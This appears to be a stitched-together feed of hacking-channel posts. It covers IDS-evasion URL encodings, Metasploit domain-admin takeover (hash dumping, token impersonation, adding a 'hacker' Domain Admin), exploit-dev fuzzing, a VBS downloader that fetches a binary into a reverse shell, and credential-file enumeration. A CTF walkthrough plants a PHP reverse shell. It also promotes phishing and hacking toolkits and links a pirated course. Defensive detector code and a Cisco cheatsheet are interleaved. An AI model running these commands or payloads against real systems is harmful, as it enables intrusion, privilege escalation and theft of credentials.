β β β Uππ»βΊπ«Δπ¬πβ β β β
Practical methods to break through IDS (intrusion detection systems):
There are many kinds of polymorphic URL encoding techniques; the author introduces nine commonly used and representative ones here. For ease of explanation, the URL /msadc/msadcs.dll is used as the example throughout. "/msadc/msadcs.dll" is included in the rule sets of Snort and other major IDS, so when we submit /msadc/msadcs.dll to the target machine directly, the IDS intercepts it and raises an alarm.
The first trick: "/./" string insertion
Because "./" means "the current directory", we can insert it into the URL to transform it without changing what it points to. For example, /msadc/msadcs.dll can be rewritten as /././msadc/././msadcs.dll, /./msadc/.//./msadcs.dll and other forms that confuse the signature-matching engine of the IDS and so deceive it. The rewritten URL is equivalent to the unmodified one. The author's experiments show that this method can bypass IDS such as Snort.
The second trick: the ASCII 00 (null) byte
Some time ago the file upload vulnerabilities circulating on the Internet exploited this same feature, so everyone must be familiar with it. Its principle is that when the computer processes a string, it automatically truncates at the ASCII code 00. We can rewrite /msadc/msadcs.dll as "/msadc/msadcs.dll Iloveheikefangxian", use WinHex to change the space between ".dll" and "Ilove" into the byte 00, save it, and then submit it with nc through a pipe. In the view of some IDS, "/msadc/msadcs.dll Iloveheikefangxian" is not the same as the attack string specified in its rule set file, so it stays indifferent to the attacker's behaviour. Look how widely the principle of "a string is automatically truncated at ASCII code 00" applies! Philosophically speaking, things are connected with each other; if we think more and dig out the underlying laws, there will be new discoveries.
The third trick: use the path separator "\"
On web servers such as Microsoft IIS, "\" can be used as a path separator just like "/". Some IDS did not take the non-standard path separator "\" into account when their rule set files were written. If we rewrite /msadc/msadcs.dll as \msadc\msadcs.dll, we can escape Snort, because the Snort rule set file has no signature for \msadc\msadcs.dll. It is worth mentioning that the path separator "\" has another magical effect: the "%5c" database-exposure trick described in "Hacker Line of Defense" some time ago. "%5c" is the hexadecimal (URL-encoded) representation of "\".
Fourth trick: hexadecimal encoding
Any character can be written as the escape symbol "%" followed by its ASCII code in hexadecimal. For example, the first character "/" in /msadc/msadcs.dll can be expressed as %2F, and the following characters likewise as "%" plus their hexadecimal ASCII codes. A URL encoded this way no longer has its original appearance; the IDS rule set file may contain no encoded form of the string, so the IDS can be bypassed. This method is ineffective, however, against IDS that use an HTTP preprocessor, which decodes the URL before matching.
The fifth trick: illegal Unicode encoding
UTF-8 allows a character set with more than 256 characters, so it also allows encodings longer than 8 bits. The hexadecimal ASCII code of the "/" character is 2F, binary 00101111. The standard UTF-8 representation of 2F is still the single byte 2F, but multi-byte (overlong) UTF-8 sequences can also decode to 2F. Such overlong forms are invalid UTF-8 and a conforming decoder rejects them, but lenient decoders accept them. The character "/" in single-byte, double-byte and three-byte UTF-8 form:

"/" representation   Bit pattern                   Binary                      Hex
Single byte          0xxxxxxx                      00101111                    2F
Double byte          110xxxxx 10xxxxxx             11000000 10101111           C0 AF
Three bytes          1110xxxx 10xxxxxx 10xxxxxx    11100000 10000000 10101111  E0 80 AF
Following this method, we can encode the entire string accordingly. Although the encoded URLs all point to the same resource, their representations differ, and the filter string may not exist in the IDS rule set file, which achieves the goal of breaking the IDS.
Sixth trick: redundant encoding
Redundant encoding is also called double decoding. I still remember the noise the Unicode decoding vulnerability and the double decoding vulnerability of IIS made in 2000-2001. At the time many friends were confused and thought the Unicode decoding vulnerability was the double decoding vulnerability; in fact they are two different things. The former is described above under "Illegal Unicode encoding". Redundant encoding means encoding a character multiple times. For example, "/" can be represented as %2f, and each of the "%", "2" and "f" characters in "%2f" can in turn be represented by its hexadecimal ASCII code; by simple combinatorics that gives 2 to the 3rd power encoding forms, so "%2f" can be rewritten as "%25%32%66", "%252f" and so on to make the URL polymorphic. The encoded string may not be present in the IDS rule set file, which can fool some IDS.
Seventh trick: add false paths
A fake directory followed by the string "../" contributes nothing to the resolved path: the directory name is cancelled out and becomes meaningless. Inserting such "../" strings therefore disrupts the signature-matching engine and breaks through the IDS!
Eighth trick: insert multiple slashes
We can use several "/" characters in place of a single "/"; the rewritten URL still works as before. For example, the request for /msadc/msadcs.dll can be changed to ////msadc////msadcs.dll. In the author's experiments this method bypasses some IDS.
Ninth trick: comprehensive polymorphic encoding
Smart as you are, you will have guessed from the subtitle: the comprehensive method combines the several polymorphic encoding techniques introduced above, which gives an even better effect. I hope you learn something from this article.
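As an added defender-side example (not part of the original article), the Python below is a small HTTP-preprocessor style normalizer: it undoes each of the nine transformations above (null truncation, iterated percent-decoding, overlong UTF-8, backslash separators, repeated slashes, "./" and "../" segments) before matching the canonical path against the /msadc/msadcs.dll signature, and it reports which evasion indicators it saw, since those are worth alerting on by themselves. The sample requests are constructed from the article's own examples; the signature set and flag names are assumptions.

```python
import re

# The article's example signature; compared after normalization, case-insensitively (IIS is case-insensitive).
SIGNATURES = {"/msadc/msadcs.dll"}

# Constructed sample request paths, one per trick in the article, plus a benign one.
SAMPLE_REQUESTS = [
    b"/././msadc/././msadcs.dll",                 # 1: "./" insertion
    b"/msadc/msadcs.dll\x00Iloveheikefangxian",   # 2: null byte truncation
    b"\\msadc\\msadcs.dll",                       # 3: backslash separators
    b"%2Fmsadc%2Fmsadcs.dll",                     # 4: hex (percent) encoding
    b"%c0%afmsadc%c0%afmsadcs.dll",               # 5: overlong UTF-8 for "/"
    b"%252fmsadc%25%32%66msadcs.dll",             # 6: double encoding
    b"/msadc/fake/../msadcs.dll",                 # 7: false path followed by "../"
    b"////msadc////msadcs.dll",                   # 8: multiple slashes
    b"/./msadc%5c..\\msadc//%6dsadcs.dll",        # 9: combination of the above
    b"/index.html",                               # benign
]

def percent_decode_once(data: bytes) -> bytes:
    """One round of %XX decoding; malformed escapes are left untouched."""
    return re.sub(rb"%([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def decode_utf8_lenient(data: bytes):
    """Decode UTF-8 the way a lenient server might: overlong sequences such as C0 AF or
    E0 80 AF are accepted and mapped to their code point. Returns (text, overlong_seen).
    Bytes that form no well-formed sequence pass through as Latin-1."""
    out, i, overlong = [], 0, False
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if b & 0xE0 == 0xC0:
            n, cp, minimum = 1, b & 0x1F, 0x80
        elif b & 0xF0 == 0xE0:
            n, cp, minimum = 2, b & 0x0F, 0x800
        elif b & 0xF8 == 0xF0:
            n, cp, minimum = 3, b & 0x07, 0x10000
        else:
            out.append(chr(b)); i += 1; continue
        cont = data[i + 1:i + 1 + n]
        if len(cont) < n or any(c & 0xC0 != 0x80 for c in cont):
            out.append(chr(b)); i += 1; continue
        for c in cont:
            cp = (cp << 6) | (c & 0x3F)
        overlong = overlong or cp < minimum      # a shorter encoding existed: illegal per RFC 3629
        out.append(chr(cp)); i += 1 + n
    return "".join(out), overlong

def normalize_path(raw: bytes):
    """Canonicalize a request path; returns (canonical_path, evasion_indicators)."""
    flags, rounds = [], 0
    while rounds < 4:                             # tricks 4 and 6: decode until stable (bounded)
        decoded = percent_decode_once(raw)
        if decoded == raw:
            break
        raw, rounds = decoded, rounds + 1
    if rounds > 1:
        flags.append("double-encoded (%d rounds)" % rounds)
    if b"\x00" in raw:                            # trick 2: the server stops at NUL, so must we
        flags.append("null byte"); raw = raw.split(b"\x00", 1)[0]
    text, overlong = decode_utf8_lenient(raw)     # trick 5
    if overlong:
        flags.append("overlong UTF-8")
    if "\\" in text:                              # trick 3
        flags.append("backslash separator"); text = text.replace("\\", "/")
    if "//" in text:                              # trick 8
        flags.append("repeated slashes"); text = re.sub(r"/+", "/", text)
    parts = []
    for seg in text.split("/"):                   # tricks 1 and 7: drop "." and resolve ".."
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            continue
        parts.append(seg)
    canonical = "/" + "/".join(parts)
    if canonical != text:
        flags.append("dot segments")
    return canonical, flags

def inspect(raw: bytes):
    """Return (matched_signature, canonical_path, indicators) for one request path."""
    canonical, flags = normalize_path(raw)
    return canonical.lower() in SIGNATURES, canonical, flags

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        hit, path, flags = inspect(req)
        print("%-5s %-20s %r  flags=%s" % ("ALERT" if hit else "ok", path, req, flags))
```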
enjoy
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
Attachment: Password Spraying Outlook Web Access_ Remote Shell.pdf (617.7 KB)
A well-written tutorial #forbeginners: Password Spraying Outlook Web Access / Remote Shell
Forwarded from Backup Legal Mega
Cinema 4D Crash Course - Design a Six Pack Case (4.42 GB)
https://www.skillshare.com/classes/Cinema-4D-Crash-Course-Design-a-Six-Pack-Case/479623344
https://mega.nz/#F!VbQCRSRZ!EHyHwr2I67CFpplwBRFyiw
Attachment: Shellphish_Simple_Phishing_Toolkit_Phishing_Page_Creator_.pdf (1 MB)
Phishing for beginners
2020 updated Linux tool: hackers-tool-kit
> It's a framework filled with a lot of options and hacking tools you use directly in the script, from brute forcing to payload making. I'm still trying to think of what to add to the script. I now have another tool out called htkl-lite; it's hackers-tool-kit, just not as big and messy. To see updates check my instagram unkn0wn, or if there are any problems message me on instagram.
INSTALLATION & RUN:
1) git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit
2) cd hackers-tool-kit
3) python install.py
Run:
4) ROOT IS NOT REQUIRED TO RUN BUT IS RECOMMENDED
5) cd hackers-tool-kit
6) python htk.py
Then choose an option.
7) The htksecure.py file runs hackers-tool-kit through proxychains and other tools so that your traffic is anonymised, but some features may be slow or not work. To run htk secure:
cd hackers-tool-kit
python htksecure.py
Tested on:
> debian
> Undercode Linux
enjoy
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
Domain Admin Exploitation:
After compromising a Windows machine:
[>] List the domain administrators (from a shell):
net group "Domain Admins" /domain
[>] Dump the hashes (Metasploit):
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
[>] Find the admins (Metasploit):
msf > spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run
msf > spool off
[>] Compromise the admin's box:
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\administrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
mydom\administrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
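On the defender's side, the last two commands above (creating an account and adding it to Domain Admins) produce Security events 4720 and 4728 on the domain controller. The Python below is an added example, not part of the original post: it parses constructed sample events, alerts on any member added to a privileged group, and raises the severity when the same batch shows that account being created, which is exactly the pattern of the final step. The group list, field layout and sample values are assumptions.

```python
import re
from dataclasses import dataclass

# Groups whose membership changes are always alert-worthy (assumption: extend for your domain).
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}
MEMBER_ADDED_EVENTS = {4728, 4732, 4756}   # global, local and universal security groups

# Constructed sample events (not real logs); the Message text follows the layout
# of the Security log descriptions for 4720 (account created) and 4728 (member added).
SAMPLE_EVENTS = [
    {"EventID": 4720, "Computer": "DC01", "Message":
        "A user account was created.\n\tSubject:\n\t\tAccount Name:\t\tadministrator\n"
        "\tNew Account:\n\t\tAccount Name:\t\thacker\n\t\tAccount Domain:\t\tMYDOM"},
    {"EventID": 4728, "Computer": "DC01", "Message":
        "A member was added to a security-enabled global group.\n"
        "\tSubject:\n\t\tAccount Name:\t\tadministrator\n"
        "\tMember:\n\t\tAccount Name:\t\tCN=hacker,CN=Users,DC=mydom,DC=local\n"
        "\tGroup:\n\t\tGroup Name:\t\tDomain Admins\n\t\tGroup Domain:\t\tMYDOM"},
    {"EventID": 4728, "Computer": "DC01", "Message":
        "A member was added to a security-enabled global group.\n"
        "\tSubject:\n\t\tAccount Name:\t\thelpdesk\n"
        "\tMember:\n\t\tAccount Name:\t\tCN=alice,CN=Users,DC=mydom,DC=local\n"
        "\tGroup:\n\t\tGroup Name:\t\tSales\n\t\tGroup Domain:\t\tMYDOM"},
]

# Each pattern finds the first "Account Name" / "Group Name" value after its section header.
_FIELDS = {
    "subject": re.compile(r"Subject:.*?Account Name:\s*([^\r\n]+)", re.S),
    "member": re.compile(r"Member:.*?Account Name:\s*([^\r\n]+)", re.S),
    "new_account": re.compile(r"New Account:.*?Account Name:\s*([^\r\n]+)", re.S),
    "group": re.compile(r"Group:.*?Group Name:\s*([^\r\n]+)", re.S),
}

def extract(message: str, name: str) -> str:
    m = _FIELDS[name].search(message)
    return m.group(1).strip() if m else ""

def cn_of(member: str) -> str:
    """4728 reports the member as a DN (CN=hacker,CN=Users,...); reduce it to the bare name."""
    m = re.match(r"CN=([^,]+)", member.strip(), re.I)
    return (m.group(1) if m else member.strip()).lower()

@dataclass
class Alert:
    computer: str
    actor: str
    member: str
    group: str
    newly_created: bool

    @property
    def severity(self) -> str:
        return "critical" if self.newly_created else "high"

def detect_privileged_additions(events) -> list:
    """Alert on every member added to a privileged group; escalate when the
    same batch of events also shows that account being created."""
    created = {extract(e["Message"], "new_account").lower()
               for e in events if e["EventID"] == 4720}
    alerts = []
    for e in events:
        if e["EventID"] not in MEMBER_ADDED_EVENTS:
            continue
        group = extract(e["Message"], "group")
        if group.lower() not in PRIVILEGED_GROUPS:
            continue
        member = cn_of(extract(e["Message"], "member"))
        alerts.append(Alert(e["Computer"], extract(e["Message"], "subject"),
                            member, group, member in created))
    return alerts

if __name__ == "__main__":
    for a in detect_privileged_additions(SAMPLE_EVENTS):
        print("[%s] %s: %s added %s to '%s'%s" % (
            a.severity.upper(), a.computer, a.actor, a.member, a.group,
            " (account created in the same batch)" if a.newly_created else ""))
```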
enjoy
git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
ExploitDev: Exploit Development Cheatsheet
------------------------------
[+] Fuzzing:
import socket

# Build a list of buffers of increasing length: "A", then 50, 100, 150, ... "A"s.
# Note that len(buffer) is the number of buffers, not a byte length, so the
# list keeps growing until it holds 1001 entries.
buffer = ["A"]
counter = 50
while len(buffer) <= 1000:
    buffer.append("A" * counter)
    counter = counter + 50

# Send each buffer to the target service. Once the service has crashed the
# next connect() fails and the loop stops; the buffer sent just before is the one that crashed it.
for buffstring in buffer:
    print("Fuzzing: " + str(len(buffstring)))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect(("192.168.0.20", 5555))
        sock.send(buffstring.encode())
    except socket.error as exc:
        print("Connection failed at length %d: %s" % (len(buffstring), exc))
        break
    finally:
        sock.close()
[+] Bad Character Testing:
# All 256 byte values in order; remove each byte the target mangles (\x00 almost always) and re-test.
badchars = (
    b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
    b"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
    b"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
    b"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
    b"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
    b"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
    b"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
    b"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
    b"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
    b"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
    b"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
    b"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
    b"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
    b"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
    b"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
    b"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
    b"\xff"
)
[+] Structured Exception Handler (SEH) exploitation notes
- Crash the application
- Check the SEH overwrite (View > SEH chain)
- Find the offset (!mona pattern_create <length>)
- Find which SEH references point into the cyclic pattern (!mona findmsp)
- Verify the offset to nSEH (next exception handler)
- Find a POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add a short jump to the payload to jump over the SEH record ("\xeb\x06" + 2 bytes of padding)
- Add the shellcode to the payload
- Keep the existing padding so the buffer length stays the same and the crash still happens.
git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
Cisco IOS Command Line Cheatsheet
--- Verify basic configuration:
Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS version, etc.
SW1# show version
Shows the current configuration held in DRAM (the running config).
SW1# show running-config
Shows the configuration stored in NVRAM, which is loaded at boot (the startup config).
SW1# show startup-config
Lists the commands currently held in the history buffer.
SW1# show history
Shows an overview of all interfaces: physical status, protocol status and IP address, if assigned.
SW1# show ip interface brief
Shows detailed information about the specified interface: status, protocol, duplex, speed, encapsulation and traffic over the last 5 minutes.
SW1# show interface vlan 1
Shows the description of all interfaces.
SW1# show interfaces description
Shows the status of all interfaces: connected or not, speed, duplex, trunk or access VLAN.
SW1# show interfaces status
Shows the RSA public key used for SSH.
SW1# show crypto key mypubkey rsa
Shows information about the leased IP address (when an interface is configured to obtain its address from a DHCP server).
SW1# show dhcp lease
Shows the router's routing table: the list of all networks the router can reach.
Router# show ip route
--- Router modes:
Router>: user mode = limited to basic monitoring commands
Router#: privileged mode (EXEC-level mode) = provides access to all other router commands
Router(config)#: global configuration mode = commands that affect the entire system
Router(config-if)#: interface mode = commands that affect interfaces
Router(config-subif)#: subinterface mode = commands that affect subinterfaces
Router(config-line)#: line mode = commands that affect lines (console, vty, aux...)
Router(config-router)#: router configuration mode
--- Changing the switch hostname:
Switch(config)# hostname SW1
--- Configuring passwords:
SW1(config)# enable secret cisco ! stored as an MD5 (Type 5) hash; this is the one to use
SW1(config)# enable password notcisco ! stored in cleartext; ignored when an enable secret is set
--- Securing the console port:
SW1(config)# line con 0
SW1(config-line)# password cisco
SW1(config-line)# login
--- Securing terminal lines:
SW1(config)# line vty 0 4
SW1(config-line)# password cisco
SW1(config-line)# login
--- Encrypting passwords:
SW1(config)# service password-encryption ! Type 7: reversible obfuscation, not a hash; it only hides line passwords from shoulder surfing
--- Configuring banners:
SW1(config)# banner motd $
enjoy
git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
UNAUTHORIZED ACCESS IS PROHIBITED $
Cisco IOS #fastTips (continued):
--- Giving the switch an IP address:
SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP
SW1(config-if)# no shutdown
--- Setting the default gateway:
SW1(config)# ip default-gateway 172.16.1.1
--- Saving configuration:
SW1# copy running-config startup-config
Destination filename [startup-config]? ! Press Enter to confirm the file name.
Building configuration...
[OK]
! "wr" is short for "write memory" and does the same as the copy above.
SW1# wr
Building configuration...
[OK]
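To make the password, line and banner settings from the two Cisco IOS posts above checkable, here is an added example that is not part of the original posts: a Python audit that parses a constructed running-config (in the form `show running-config` prints) and reports the weak spots, with a hardened config beside it that passes clean. The sample configs, their placeholder hashes and the finding texts are assumptions.

```python
import re

# Constructed sample configs (not from a real device; the "secret 5" hashes are placeholders).
WEAK_CONFIG = """\
hostname SW1
enable secret 5 $1$placeholder$notarealhash
enable password 7 094F471A1A0A
service password-encryption
!
line con 0
 password 7 0822455D0A16
!
line vty 0 4
 login
!
line vty 5 15
 no login
!
"""

HARDENED_CONFIG = """\
hostname SW1
enable secret 5 $1$placeholder$notarealhash
service password-encryption
username admin secret 5 $1$placeholder$notarealhash
banner motd $ UNAUTHORIZED ACCESS IS PROHIBITED $
!
line con 0
 login local
!
line vty 0 4
 login local
 transport input ssh
!
"""

def parse_line_blocks(config: str) -> dict:
    """Map each 'line ...' block (con 0, vty 0 4, ...) to its indented commands."""
    blocks, current = {}, None
    for raw in config.splitlines():
        if raw.startswith("line "):
            current = raw[5:].strip()
            blocks[current] = []
        elif raw.startswith(" ") and current is not None:
            blocks[current].append(raw.strip())
        else:
            current = None          # '!' or any top-level command ends the block
    return blocks

def audit(config: str) -> list:
    """Return a list of findings for the password, line and banner settings."""
    findings = []
    if re.search(r"^enable password ", config, re.M):
        findings.append("enable password: stored cleartext or Type 7 (reversible); remove it and keep only enable secret")
    if not re.search(r"^enable secret ", config, re.M):
        findings.append("no enable secret: privileged EXEC is not protected by a hashed secret")
    if not re.search(r"^service password-encryption", config, re.M):
        findings.append("service password-encryption off: line passwords appear in cleartext in show running-config")
    for m in re.finditer(r"^\s*password 7 \S+", config, re.M):
        findings.append("Type 7 line password '%s': reversible obfuscation, not a hash; use login local with username ... secret" % m.group(0).strip())
    if not re.search(r"^banner motd", config, re.M):
        findings.append("no banner motd: add a legal warning banner")
    for name, cmds in parse_line_blocks(config).items():
        authenticated = any(c == "login" or c.startswith("login ") for c in cmds)
        has_password = any(c.startswith("password ") for c in cmds)
        if not authenticated:
            findings.append("line %s: no login authentication" % name)
        elif "login" in cmds and not has_password:
            findings.append("line %s: 'login' without a password; IOS refuses the line until one is set" % name)
        if name.startswith("vty") and "transport input ssh" not in cmds:
            findings.append("line %s: restrict to 'transport input ssh' so credentials never cross the wire in cleartext" % name)
    return findings

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print("%s config: %d finding(s)" % (label, len(audit(cfg))))
        for f in audit(cfg):
            print("  -", f)
```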
enjoy
git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
File Upload / Download / Transfer:
File Transfers
- Post exploitation refers to the actions performed by an attacker once some level of control has been gained on the target.
- Simple local web servers
- Run a basic HTTP server (Python 2), handy for serving up shells etc.:
python -m SimpleHTTPServer 80
- Run a basic Python 3 HTTP server, handy for serving up shells etc.:
python3 -m http.server
- Run a basic Ruby WEBrick HTTP server:
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
- Run a basic PHP HTTP server:
php -S $ip:80
- Creating a wget VB Script on Windows:
*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*
- Windows file transfer script that can be pasted into the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be pasted into a basic Windows reverse shell and used to transfer files from a web server (the timeout 1 commands are required after each new line):
echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1
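The echo-by-echo assembly of webdl.vbs above leaves a distinctive trail in process-creation telemetry (Security 4688 with command-line auditing enabled, or Sysmon event 1): a burst of `echo ... >> file.vbs` commands from one user on one host, mentioning Microsoft.XMLHTTP or Adodb.Stream, followed by cscript/wscript running that file. The Python below is an added example, not part of the original post: it runs that detection over constructed sample records. The record fields, token list and thresholds are assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Strings an echo-built downloader almost always contains (assumption: extend as needed).
SUSPICIOUS_TOKENS = ("microsoft.xmlhttp", "msxml2.xmlhttp", "adodb.stream", "savetofile")
# 'echo ... >> something.vbs'   and   'cscript/wscript ... something.vbs'
APPEND_RE = re.compile(r"\becho\s.*>>\s*(\S+\.(?:vbs|js|ps1|bat))\b", re.I)
EXEC_RE = re.compile(r"\b(?:cscript|wscript)(?:\.exe)?\b.*?(\S+\.(?:vbs|js))\b", re.I)

# Constructed sample process-creation records, flattened the way a SIEM might
# present 4688 / Sysmon 1 fields. Not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "MYDOM\\bob", "cmd": 'echo Set args = Wscript.Arguments >> webdl.vbs'},
    {"host": "WS01", "user": "MYDOM\\bob", "cmd": 'timeout 1'},
    {"host": "WS01", "user": "MYDOM\\bob", "cmd": 'echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs'},
    {"host": "WS01", "user": "MYDOM\\bob", "cmd": 'echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs'},
    {"host": "WS01", "user": "MYDOM\\bob", "cmd": 'echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs'},
    {"host": "WS01", "user": "MYDOM\\bob", "cmd": 'cscript //nologo webdl.vbs'},
    {"host": "WS02", "user": "MYDOM\\alice", "cmd": 'echo build started >> build.log'},
    {"host": "WS02", "user": "MYDOM\\alice", "cmd": 'cscript //nologo deploy.vbs'},
]

@dataclass
class Finding:
    host: str
    user: str
    script: str
    appends: int
    tokens: list
    executed: bool

    @property
    def severity(self) -> str:
        return "critical" if self.executed else "high"

def detect_echo_cradles(events, min_appends: int = 3) -> list:
    """Group 'echo >> script' commands by (host, user, script); report a script when
    it was assembled from at least min_appends lines or mentions a suspicious COM
    object, and mark it executed if cscript/wscript later ran that same file."""
    builds = defaultdict(lambda: {"appends": 0, "tokens": set(), "executed": False})
    for e in events:
        cmd = e["cmd"]
        m = APPEND_RE.search(cmd)
        if m:
            b = builds[(e["host"], e["user"], m.group(1).lower())]
            b["appends"] += 1
            b["tokens"].update(t for t in SUSPICIOUS_TOKENS if t in cmd.lower())
            continue
        m = EXEC_RE.search(cmd)
        if m:
            key = (e["host"], e["user"], m.group(1).lower())
            if key in builds:          # only scripts we saw being assembled count
                builds[key]["executed"] = True
    return [Finding(h, u, s, b["appends"], sorted(b["tokens"]), b["executed"])
            for (h, u, s), b in builds.items()
            if b["appends"] >= min_appends or b["tokens"]]

if __name__ == "__main__":
    for f in detect_echo_cradles(SAMPLE_EVENTS):
        print("[%s] %s %s assembled %s from %d echo lines (tokens: %s)%s" % (
            f.severity.upper(), f.host, f.user, f.script, f.appends,
            ", ".join(f.tokens) or "none", "; executed" if f.executed else ""))
```

Command-line auditing is off by default on Windows, so enable "Include command line in process creation events" (or deploy Sysmon) before relying on this.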
enjoy
git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
Unix-based hosts:
#commands
hostname
whoami
uname -a
cat /etc/lsb-release
dmesg | grep Linux
cat /etc/passwd
cat /etc/sudoers
netstat -antup
ps -aux
ps aux | grep root
crontab -l
/sbin/ifconfig -a
iptables -L
arp -e
cat ~/.bash_history
cat ~/.ssh/authorized_keys
mount
- Check installed applications
- Check installed compilers/interpreters
enjoy
git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
Born2Root: 2: Vulnhub Walkthrough
Penetration methodology:
- Scanning
- Enumeration
- Exploitation
- Privilege Escalation
- Capture the Flag
Walkthrough:
1) Let's start off by scanning the network to find our target.
netdiscover
2) We found our target: 192.168.1.9. Time to scan the target's IP with nmap.
3) The nmap scan result shows three major ports open: 22 (SSH), 88 (HTTP) and 111 (RPC).
nmap -A 192.168.1.9
4) Since port 80 is running HTTP, we opened the target IP address in the browser. This gives us an attractive-looking web page, but after spending a considerable amount of time we found it is nothing but a distraction; we couldn't find anything of importance on the website.
> So we moved on to directory brute forcing to get any hints. The dirb scan gives us the Joomla directory, which is a major breakthrough. Now it's time to exploit the machine through Joomla.
> dirb http://192.168.1.9/
5) Now that we have found the Joomla directory, we browse it in the browser. Here we have the blog made by the author, titled Tim's Blog. This could be a hint for a username, so let's keep it in mind. There is a login form at the bottom right, so we will have to guess the user credentials.
6) By convention we try the default credentials first. A quick search tells us that the default Joomla username is "admin". For the password we will perform a dictionary attack; for that we build a dictionary from the words on the web page using "cewl".
> cewl http://192.168.1.9/joomla/ > dict.txt
7) Now that we have the dictionary dict.txt, it's time to perform the brute force. We use Burp Suite for this (to learn more, refer to this article). The brute force gives us "travel" as the password.
> Now we use these credentials to log in to Joomla:
Username: admin
Password: travel
8) We are now logged in to Joomla as the SuperUser. To exploit the Joomla server we use the PHP reverse shell that ships with Kali Linux. We move to the Template section: first click the Extensions option in the menu, then open the beez3 template and choose Customise. This opens an edit section as shown in the image. Select index.php and replace its contents with our reverse shell; remember to change the IP address and/or the port.
9) After editing index.php, save the file by clicking the Save button. We have now replaced index.php with our reverse shell script, and all that is left is to run index.php. To catch a session we need a listener that will receive the reverse shell; we use netcat, as shown in the image below.
11) After we got the shell, it was time to enumerate the ma
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
cd /opt
ls
cd scripts
ls
cat fileshare.py
After finding the credentials all that was left was to login as Tim. For that we used the su command and gave the following credentials:
Username: tim
Password: lulzlol
12) After logging in as Tim, we ran the sudo with -l parameter to give us the user rights of the user tim. As we can see in the given image, tim has all the permissions. After this, we traversed inside the root directory using the cd command. Here we found the final flag.
su tim
sudo -l
sudo su
cd /root
ls
cat flag.txt
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
